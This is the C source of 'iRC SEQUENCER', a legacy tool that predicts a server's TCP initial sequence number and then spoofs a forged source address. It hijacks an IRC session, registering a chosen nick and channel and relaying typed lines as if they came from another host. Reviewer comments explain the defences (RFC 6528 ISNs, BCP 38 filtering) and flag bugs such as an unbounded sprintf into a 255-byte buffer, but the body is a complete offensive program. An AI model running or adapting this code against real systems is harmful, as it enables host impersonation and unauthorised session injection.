    ..:-={{Collaborative Security Information Center}}=-:..
    X-TREME & TECHNOTRONIC Security Collaboration Project
http://www.technotronic.com  -=(c)=-  http://www.x-treme.abyss.com


/*								*/
/* iRC SEQUENCER v0.0001 = MUTUALLY DEVELOPED BY Z AND VECT0R-X */
/* Under Solaris try:						*/
/*	gcc x.c -lsocket -lnsl -L/usr/ucblib -lucb		*/

#include "tcpip.c"

/*
 * File-scope state shared with main().  Everything lives in globals; the
 * packet helpers (sendtcppacket, gettcppacket) come from the included
 * tcpip.c and are not visible in this file.
 */

/* Value passed as the source-port argument of every sendtcppacket() call. */
unsigned long sourceport = 23;

/* Addresses copied out of the resolved sockaddr structures / local host. */
unsigned long dest;     /* server address (from addr)                 */
unsigned long spoofed;  /* forged source address (from spoofedaddr)   */
unsigned long src;      /* this machine's own address                 */

/* Sequence-number bookkeeping. */
unsigned long nseq;     /* observed server sequence plus the fixed offset */
unsigned long tarport;  /* server port, parsed from argv[2]               */
unsigned long temp;     /* scratch copy of the sequence field             */

/* Pointers straight into argv; nothing here is copied or length-checked. */
char *nickn;
char *userid;
char *channel;
char *ircname;
char *current;          /* channel name shown in the interactive prompt */

/* Outgoing line buffer: holds the handshake text and later each stdin line. */
char str[255];
char *string;           /* return value of fgets() on str */

/* Scratch buffer: local host name first, then each received packet. */
char buf[4096];

int len;                /* IP header length in bytes of the received packet */
int rec;                /* raw socket used for receiving */
int sen;                /* raw socket used for sending   */
int i = 1;              /* not referenced by main() in this file */
int adder = 128000;     /* fixed offset added to the observed sequence number */
int stringlen = 0;      /* length of the payload currently in str */

struct sockaddr_in addr;         /* server address                */
struct sockaddr_in spoofedaddr;  /* address used as forged source */
struct hostent *host;            /* last resolver result          */

/*
 * Entry point.  Reads eight command-line arguments, resolves the server and
 * the address to be forged, opens two raw sockets, and then:
 *   1. sends one SYN from this machine's real address and reads the server's
 *      reply to learn its current sequence number;
 *   2. adds a fixed offset (128000, or 64000 when argv[8] starts with '2')
 *      to that number and resets the probe connection;
 *   3. sends SYN, ACK and data segments carrying the forged source address,
 *      using the guessed number as the acknowledgement, without ever reading
 *      a reply for that connection;
 *   4. forwards each line typed on stdin as a further data segment.
 *
 * Reviewer notes (defensive context):
 *   - The guess in step 2 only holds for TCP stacks whose initial sequence
 *     number grows by a constant step per connection.  Stacks that generate
 *     ISNs as described in RFC 6528 do not have this property.
 *   - The forged segments leave this host with a source address that is not
 *     its own; source-address validation at the network edge (BCP 38) drops
 *     such traffic before it reaches the server.
 *   - Both the probe and the forged SYN are sent with the same source port
 *     (23) and the same starting sequence value (fakesequence), a few
 *     milliseconds apart, which is a recognisable pattern in packet captures.
 *   - Raw sockets normally require elevated privilege, so the program is
 *     expected to fail at socket() for an ordinary user.
 *
 * NOTE(review): `void main` is not a standard signature; the program only
 * ever leaves through exit(1) or by being killed.
 */
void main(int argc, char *argv[])
{
	/* Starting sequence number for our own segments: constant plus the PID. */
	unsigned long fakesequence = 408618+getpid();

	system("clear");
	printf("iRC SEQUENCE - Writtin by z and vect0rx.\n\n");

	/* Exactly eight arguments are required; anything else prints usage. */
	if (argc != 9) {
		fprintf(stderr,"Usage: %s <server> <port> <nick> <userid> <spoof> <ircname> <channel> {1|2}\n\n",argv[0]);
		fprintf(stderr,"		<server> - Site spoof is attempted on.\n");
		fprintf(stderr,"		  <port> - Port to access on <server>.\n");
		fprintf(stderr,"		  <nick> - Nickname for spoof to user.\n");
		fprintf(stderr,"		<userid> - Account name of spoof.\n");
		fprintf(stderr,"		 <spoof> - Host to appear from.\n");
		fprintf(stderr,"	       <ircname> - Default is (*Unknown*).\n");
		fprintf(stderr,"	(w/o #)<channel> - Initial channel (0 for none).\n");
		fprintf(stderr,"	               1 - Offset of 128000 (common).\n");
		fprintf(stderr,"	               2 - Offset of 64000 (not likely).\n\n");
		exit(1);
	}
	/* NOTE(review): atoi() gives no error indication; a non-numeric port
	 * silently becomes 0.  The string arguments are kept as raw argv
	 * pointers with no length or character validation. */
	tarport = atoi(argv[2]);
	nickn = argv[3];
	userid = argv[4];
	ircname = argv[6];
	channel = argv[7];		
        if (argv[8][0] == '2') adder=64000;

	/* Resolve the address to forge: dotted quad first, then a DNS lookup.
	 * NOTE(review): comparing inet_addr()'s result with -1 also rejects the
	 * literal 255.255.255.255; h_addrtype/h_length from the resolver are
	 * trusted without checking that the result is a 4-byte AF_INET address. */
	memset(&spoofedaddr,0,sizeof(spoofedaddr));
	spoofedaddr.sin_family = AF_INET;
	if ((spoofedaddr.sin_addr.s_addr = inet_addr(argv[5])) == -1) {
		if ((host = gethostbyname(argv[5])) == NULL) {
			printf("Unknown host %s.\n",argv[5]);
			exit(1);
		}
		spoofedaddr.sin_family = host->h_addrtype;
		memcpy((caddr_t) &spoofedaddr.sin_addr,host->h_addr,host->h_length);
	}
	/* Keep a 4-byte copy of the address for the packet-building calls. */
	memcpy(&spoofed,(char *)&spoofedaddr.sin_addr.s_addr,4);

	/* Same resolution steps for the server address (same caveats apply). */
	memset(&addr,0,sizeof(addr));
	addr.sin_family = AF_INET;
	if ((addr.sin_addr.s_addr = inet_addr(argv[1])) == -1) {
		if ((host = gethostbyname(argv[1])) == NULL) {
			printf("Unknown host %s.\n",argv[1]);
			exit(1);
		}
		addr.sin_family = host->h_addrtype;
		memcpy((caddr_t) &addr.sin_addr,host->h_addr,host->h_length);
	}
	memcpy(&dest,(char *)&addr.sin_addr.s_addr,4);

	/* Raw TCP socket used only for reading packets in the probe loop. */
	if ((rec = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
		perror("error: recv socket");
		exit(1);
	}

	/* Raw IP socket handed to sendtcppacket() for every outgoing segment. */
	if ((sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("error: send socket");
		exit(1);
	}

/*	
	sen = openintf("ppp0");
*/	 


	/* Look up this machine's own address via its host name.
	 * NOTE(review): gethostname()'s return value is not checked, and only
	 * the first 4 bytes of the resolved address are copied. */
	gethostname(buf, 128);
	if ((host=gethostbyname(buf))==NULL) {
		fprintf(stderr, "Can't get my hostname!?\n");
		exit(1);
	}
	memcpy(&src,host->h_addr,4);


	/* Probe: one SYN from the real local address to sample the server's
	 * current sequence number. */
        sendtcppacket(sen, src, dest, &addr, TH_SYN, sourceport,
			tarport, fakesequence, 0, NULL, 0);

	/* Read packets until one from the server matches the probe's ports.
	 * `ip` and `tcp` are not declared in this file; presumably globals from
	 * tcpip.c -- confirm.
	 * NOTE(review): gettcppacket()'s result is ignored and the header length
	 * taken from the packet is not checked against the number of bytes
	 * actually received, so the TCP header may be read from stale buffer
	 * contents.  The loop has no timeout. */
	for (;;) {
	    gettcppacket(rec,buf,sizeof(buf));
	    ip = (struct iphdr *) buf;
	    if (ip->saddr != dest) continue;
	    len = ip->ihl << 2;
	    tcp = (struct tcphdr *) (buf+len);
            if (ntohs(tcp->th_dport)==sourceport && ntohs(tcp->th_sport)==tarport) {
                    /* htonl() is used where a network-to-host conversion is
                     * meant; the two perform the same byte swap on common
                     * platforms. */
                    temp=htonl(tcp->th_seq);
		    nseq=temp; 
		    /* Guess for the next connection: observed value plus the
		     * fixed offset chosen on the command line. */
		    nseq+=adder;
		    /* NOTE(review): adder is an int but is printed with %lu. */
		    printf("Sequence returned is %lu, Offset is %lu\n",
				nseq, adder);
		    /* Tear down the probe connection. */
		    sendtcppacket(sen, src, dest, &addr, TH_RST, sourceport,
					tarport, fakesequence, 0, NULL, 0);
                    break; /* out of for loop */
            }
	}
	
	/* NOTE(review): tarport is an unsigned long but is printed with %d. */
	printf("%s!%s@%s on server %s:%d on channel %s\n",
			nickn, userid, argv[5], argv[1], tarport, channel);

        
	/* From here on every segment carries the forged source address.  No
	 * reply is read; the fixed sleeps stand in for waiting on the server. */
	sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_SYN,sourceport,
			tarport,fakesequence,0,NULL,0);
        printf("SYN Devilered, Waiting on SYN/ACK reply.\n"); fflush(stdout);
	usleep(10000);
    	
	/* Both counters are pre-incremented in the argument list, so the ACK
	 * carries fakesequence+1 and acknowledges the guessed number + 1. */
	sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK,sourceport,
			tarport,++fakesequence,++nseq,NULL,0);
        printf("ACK Devilered, Assuming safe to send data.\n"); fflush(stdout);
        usleep(5000);

	/* Build the client registration lines.
	 * NOTE(review): sprintf() writes four unbounded command-line strings
	 * into the 255-byte global `str`; long arguments overflow it.  The
	 * arguments are also not checked for embedded CR/LF. */
        printf("Sending irc client handshake for %s.\n", nickn); fflush(stdout);
	sprintf(str,"USER %s # # :%s\r\nNICK %s\r\nJOIN #%s\r\n", 
	userid, ircname, nickn, channel);
    	stringlen = strlen(str);
	sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
			tarport,fakesequence,nseq,str,stringlen);
	/* Advance our own sequence number by the payload just sent. */
        fakesequence+=stringlen;

	current = channel;

	/* Interactive loop: each stdin line is sent as one data segment.
	 * nseq is never advanced, since nothing the server sends is read.
	 * NOTE(review): fgets() returns NULL at end of input and that value is
	 * passed straight to strlen(); the loop has no exit condition. */
	for(;;) {
  	    printf("vczseq:#%s> ", current); fflush(stdout);
  	    string = fgets(str, 255, stdin); 
  	    stringlen = strlen(string);
  	  
	    sendtcppacket(sen,spoofed,dest,&spoofedaddr,TH_ACK|TH_PUSH,sourceport,
			tarport,fakesequence,nseq,string,stringlen);
	    fakesequence+=stringlen;
	}

}
/*
*/
